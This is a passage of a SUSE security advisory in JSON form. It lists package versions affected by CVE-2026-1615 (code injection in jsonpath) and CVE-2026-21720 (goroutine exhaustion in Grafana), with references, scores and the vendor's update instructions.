"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-68156"
},
{
"cve": "CVE-2026-1615",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-1615"
}
],
"notes": [
{
"category": "general",
"text": "Versions of the package jsonpath before 1.2.0 are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle untrusted data safely. An attacker can exploit this vulnerability by supplying a malicious JSON Path expression that, when evaluated, executes arbitrary JavaScript code, leading to Remote Code Execution in Node.js environments or Cross-site Scripting (XSS) in browser contexts. This affects all methods that evaluate JSON Paths against objects, including .query, .nodes, .paths, .value, .parent, and .apply.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-1615",
"url": "https://www.suse.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "SUSE Bug 1257897 for CVE-2026-1615",
"url": "https://bugzilla.suse.com/1257897"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "critical"
}
],
"title": "CVE-2026-1615"
},
{
"cve": "CVE-2026-21720",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21720"
}
],
"notes": [
{
"category": "general",
"text": "Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine blocks forever trying to send on an unbuffered channel. Sustained traffic with random hashes keeps tripping this timeout, so goroutine count grows linearly, eventually exhausting memory and causing Grafana to crash on some systems.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
